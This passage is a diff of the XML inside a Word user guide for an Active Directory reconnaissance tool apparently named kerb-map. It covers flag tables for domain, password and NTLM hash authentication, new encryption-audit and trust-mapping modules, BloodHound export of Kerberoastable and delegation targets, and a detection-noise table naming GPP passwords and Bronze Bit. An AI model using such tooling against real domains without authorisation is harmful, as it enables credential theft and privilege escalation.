+        <w:t>Writes a BloodHound-compatible JSON file containing custom nodes for Kerberoastable and AS-REP Roastable accounts, plus delegation nodes for Unconstrained (Computer type), Constrained (User type with allowedtodelegate), and RBCD targets (Computer type). Properties include hasspn, dontreqpreauth, unconstraineddelegation, and trustedtoauth flags. This file can be imported directly into BloodHound for visual path analysis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14678,13 +13383,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="42" w:name="_Toc224561322"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>7.4  Scan</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> History Database</w:t>
+      <w:r>
+        <w:t>7.4  Scan History Database</w:t>
       </w:r>
       <w:bookmarkEnd w:id="42"/>
     </w:p>
@@ -14696,21 +13396,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>Every scan is automatically saved to a local SQLite database at ~</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>/.kerb</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>-map/results.db. This allows you to:</w:t>
+        <w:t>Every scan is automatically saved to a local SQLite database at ~/.kerb-map/results.db. This allows you to:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14940,27 +13626,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">  ID   </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>3  corp</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>.local         DC: 192.168.1.10   Operator: jsmith   2024-01-15T14:30:22</w:t>
+              <w:t xml:space="preserve">  ID   3  corp.local         DC: 192.168.1.10   Operator: jsmith   2024-01-15T14:30:22</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14991,27 +13657,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">  ID   </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>2  corp</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>.local         DC: 192.168.1.10   Operator: jsmith   2024-01-14T09:15:11</w:t>
+              <w:t xml:space="preserve">  ID   2  corp.local         DC: 192.168.1.10   Operator: jsmith   2024-01-14T09:15:11</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15141,15 +13787,7 @@
       <w:bookmarkStart w:id="43" w:name="_Toc224561323"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>8</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Complete</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Flag Reference</w:t>
+        <w:t>8.  Complete Flag Reference</w:t>
       </w:r>
       <w:bookmarkEnd w:id="43"/>
     </w:p>
@@ -15169,13 +13807,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="44" w:name="_Toc224561324"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>8.1  Target</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &amp; Authentication</w:t>
+      <w:r>
+        <w:t>8.1  Target &amp; Authentication</w:t>
       </w:r>
       <w:bookmarkEnd w:id="44"/>
     </w:p>
@@ -15316,25 +13949,125 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Target domain name (e.g. </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>Target domain name (e.g. corp.local)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3600" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C0392B"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-dc / --dc-ip</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5760" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:color w:val="333333"/>
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>Domain controller IP address</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3600" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:color w:val="C0392B"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-u / --username</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5760" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:color w:val="333333"/>
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>)</w:t>
+              <w:t>Domain username</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15365,7 +14098,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>-dc / --dc-ip</w:t>
+              <w:t>-p / --password</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15393,7 +14126,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>Domain controller IP address</w:t>
+              <w:t>Plaintext password</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15424,7 +14157,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>-u / --username</w:t>
+              <w:t>-H / --hash</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15452,143 +14185,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t>Domain username</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3600" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="C0392B"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-p / --password</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="5760" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="F2F3F4"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>Plaintext password</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3600" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="C0392B"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>-H / --hash</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="5760" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:left w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-              <w:right w:val="single" w:sz="1" w:space="0" w:color="BDC3C7"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="120" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="120" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">NTLM hash. Accepts </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>LM:NT</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or NT only</w:t>
+              <w:t>NTLM hash. Accepts LM:NT or NT only</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15669,13 +14266,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="45" w:name="_Toc224561325"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>8.2  Module</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Selection</w:t>
+      <w:r>
+        <w:t>8.2  Module Selection</w:t>
       </w:r>
       <w:bookmarkEnd w:id="45"/>
     </w:p>
@@ -16175,6 +14767,94 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>--encryption</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7020" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Run weak encryption audit (RC4/DES on accounts and DCs)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>--trusts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7020" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Run domain trust mapping with SID filtering risk assessment</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -16192,12 +14872,10 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="46" w:name="_Toc224561326"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>8.3  Output</w:t>
       </w:r>
       <w:bookmarkEnd w:id="46"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -16594,13 +15272,11 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="47" w:name="_Toc224561327"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>8.4  Tuning</w:t>
       </w:r>
       <w:bookmarkEnd w:id="47"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -16820,13 +15496,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="48" w:name="_Toc224561328"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>8.5  Scan</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> History</w:t>
+      <w:r>
+        <w:t>8.5  Scan History</w:t>
       </w:r>
       <w:bookmarkEnd w:id="48"/>
     </w:p>
@@ -17052,15 +15723,7 @@
       <w:bookmarkStart w:id="49" w:name="_Toc224561329"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>9</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Detection</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Profile</w:t>
+        <w:t>9.  Detection Profile</w:t>
       </w:r>
       <w:bookmarkEnd w:id="49"/>
     </w:p>
@@ -17091,13 +15754,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Toc224561330"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>9.1  Noise</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Level by Module</w:t>
+      <w:r>
+        <w:t>9.1  Noise Level by Module</w:t>
       </w:r>
       <w:bookmarkEnd w:id="50"/>
     </w:p>
@@ -18272,6 +16930,522 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Encryption audit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>1644 (if diag logging on)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Trust mapping</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>1644 (if diag logging on)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>GPP Passwords (MS14-025)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>1644</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Bronze Bit (CVE-2020-17049)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
